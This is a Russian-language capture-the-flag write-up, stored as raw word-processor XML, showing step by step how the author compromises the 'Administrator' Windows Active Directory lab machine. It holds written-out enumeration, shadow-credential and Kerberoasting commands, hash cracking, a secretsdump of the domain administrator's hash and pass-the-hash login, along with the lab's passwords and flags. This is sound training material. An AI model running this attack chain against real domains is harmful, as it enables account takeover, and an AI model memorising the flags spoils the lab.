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Administrator</w:t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Я буду использовать следующий алгоритм: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 Разведка;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Сканирование;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3. Поиск уязвимостей;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4. Эксплуатация уязвимостей;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Этап 1</w:t>
      </w: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 Разведка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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Мне были даны стартовые учетные данные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Olivia : ichliebedich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.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IP адрес моей машины кали – 10.10.14.190, IP адрес уязвимой машины Administrator – 10.10.11.42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Далее я внес данные в файл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/etc/hosts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sudo echo “10.10.11.42 administrator.htb” &gt;&gt; /etc/hosts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). Теперь можно переходить к следуещему этапу.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Этап 2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 Сканирование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Первым делом, мне нужно узнать ою открытых портах. Для этого используется инструмент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nmap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Использую команду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nmap -sV -p- -T4 -v -A -oN A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125730</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>776605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5928995" cy="387540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87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dministratorNmap.nmap administrator.htb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и получаю результаты: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Открытые порты, их сервисы и версии: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Порт</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Сервис</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Версия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21/tcp    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">ftp           </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft ftpd                                                                                                          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53/tcp    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">domain        </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Simple DNS Plus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88/tcp    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">kerberos-sec  </w:t>
        <w:tab/>
        <w:t>Microsoft Windows Kerberos (server time: 2024-12-08 11:02:05Z)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135/tcp  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139/tcp   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">netbios-ssn   </w:t>
        <w:tab/>
        <w:t>Microsoft Windows netbios-ssn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389/tcp  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">ldap          </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows Active Directory LDAP (Domain: administrator.htb0.,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445/tcp   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>microsoft-ds?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464/tcp   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>kpasswd5?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593/tcp   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">ncacn_http    </w:t>
        <w:tab/>
        <w:t>Microsoft Windows RPC over HTTP 1.0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636/tcp   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>tcpwrapped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3268/tcp  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">ldap          </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows Active Directory LDAP (Domain: administrator.htb0.,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3269/tcp  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>tcpwrapped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5985/tcp  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">http          </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)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9389/tcp  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">mc-nmf        </w:t>
        <w:tab/>
        <w:t>.NET Message Framing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47001/tcp </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">http          </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)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49664/tcp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49665/tcp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49666/tcp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49667/tcp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49668/tcp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55412/tcp </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">ncacn_http </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows RPC over HTTP 1.0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55417/tcp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55424/tcp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55437/tcp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55469/tcp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56615/tcp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57948/tcp </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">msrpc         </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows RPC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Я попробовал войти через ftp на сервер, но домашняя директория предоставленных учетных данных недоступна.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Очевидно, что на операционной ситемой является Windows. Также доступны 139 и 445 порты,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которые также применяюся для обмена файлами. Можно воспользоваться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smbclient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. Воспользовавшись командой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smbclient -L //10.10.11.42 --user=Olivia --password=ichliebedich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я смог извлечь все диски и вложения из сервера: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655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6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Я не смог извлечь никаких полезных данных из этих вложений.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У нас также открыт 5985 порт, а это значит, что доступен </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b/>
            <w:bCs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</w:rPr>
          <w:t>winrm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Команда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crackmapexec winrm 10.10.11.42 -u Olivia -p ichliebedich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дала понять, что в домене существует пользователь.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18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Продолжаю перечисление пользователей. С помощью инструмента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rpcclient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и команды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rpcclient -U "Olivia" 10.10.11.42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мне удалось подключиться. Здесь я вызвал справку (это можно сделать, введя help). В справке я нашел команду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enumdomusers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которая помогда перечислить пользователей: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4617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Пользователи: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Administrator – rid:[0x1f4]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Guest – rid:[0x1f5] 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krbtgt – rid:[0x1f6]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olivia – rid:[0x454]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michael – rid:[0x455]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benjamin – rid:[0x456]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emily – rid:[0x458] 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ethan – rid:[0x459] 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alexander – rid:[0xe11]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emma – rid:[0xe12]    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У пользователя Administrator, скорее всего, будет самая сильная защита и права, у Guest – наоборот. Пользователь krbtgt будет сервисом с ограниченными возможностями, olivia – текуший пользователь. Попробую узнать пароль для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michael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Я нашел одну очень интересную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</w:rPr>
          <w:t>статью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и решил попробовать инструмент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pywhisker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, установил его.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Дополнительно изучил TGT и TGS,  а также доустановил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targetedKerberoast.py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.Воспользовавшись командами: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1. pywhisker -d "administrator.htb" -u "olivia" -p "ichliebedich" --target "michael" --action "add"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2. sudo python3 targetedKerberoast.py -v -d "administrator.htb" -u "Olivia" -p ichliebedich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Я получил хэш пароля michael. Воспользовавшись джоном, восстановил пароль. Получилась новая комбинация учетных данных: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michael –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Password123!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8036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</w:rPr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Данные учетные данные не подходят </w:t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д</w:t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ля ftp, н</w:t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о подходят </w:t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для evil-winrm. Следующий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benjamin</w:t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. </w:t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Я вошел в учетную запись michael с помощью evil-winrm. Там был скрипт на powershell, позволяющий пользователю michael изменять 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-104775</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>988695</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="247332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пароль пользователя benjamin. Это я и сделал!!!</w:t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Итак, третяя учетная запись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benjamin : password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И о чудо!!! Я смог воспользоваться ftp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b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814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Там находился файл Backup.psafe3 . Мои дальнейшие действия:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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pwsafe2john Backup.psafe3 &gt; Backup.hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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john --wordlist=/usr/share/wordlists/rockyou.txt Backup.hash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</w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b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-123825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>193040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="32391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Расширение psafe3 используется для безопасного хранения паролей. Чтобы узнать пароль emily, начала нужно установить инструмент pwsafe3 (sudo apt install &lt;packet&gt;). Затем из командной строки запустить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pwsafe &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"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 В порвое поле ввести путь до .psafe3 файла, во второе – взломанный пароль (tekieromucho).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5525" cy="439102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Войдя в приложение, нужно выбрать строку с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emily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и нажать на кнопку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password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Пароль будет скопирован в буфер обмена.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Четвертая учетная запись </w:t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emily : UXLCI5iETUsIBoFVTj8yQFKoHjXmb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В папке C:\Users\emily\Desktop находился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первый флаг: f763e5bef9bafbe809221669fcb19171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Далее нужно получить пароль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ethan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 Нужно использовать следующий алгоритм:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr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pywhisker -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --target ethan --action "add"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr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python targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb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На втором шаге может возникнуть ошибка KRB_AP_ERR_SKEW . Она озникает из-за различия во времени клиента и сервера. Чтобы это исправить, необходимо ввести следующие команды sudo timedatectl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set-ntp off;                                                                                                                     </w:t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sudo rdate -n 10.10.11.42 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8981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8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Я записал хэш в файл и с помощью джона получил пароль.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Пятый пользователь – ethan : limpbizkit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Этот пользователь обладает самыми большими привелегиями из доступных.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С помощью данных ethan попытаюсь задампить администратора. Мои действия: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impacket-secretsdump administrator.htb/ethan:</w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts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</w:rPr>
          <w:t>limpbizkit@10.10.11.42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–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получаю дамп администратора, который, в том числе, содержит хэш администратора.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Данные шестого пользователя –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Administrator : 3dc553ce4b9fd20bd016e098d2d2fd2e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(это хэш). С помощью этих данных я могу войти в учетную запись и забрать последний флаг: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6240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Флаг root: 6373b7e64f995da2f6e2d81831b36112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ЗАДАНИЕ ВЫПОЛНЕНО!!!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book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm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book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials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mailto:limpbizkit@10.10.11.42" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11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LibreOffice/24.8.3.2$Linux_X86_64 LibreOffice_project/480$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>9</Pages>
  <Words>815</Words>
  <Characters>5399</Characters>
  <CharactersWithSpaces>7784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2024-12-08T07:02:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-08T19:20:18Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>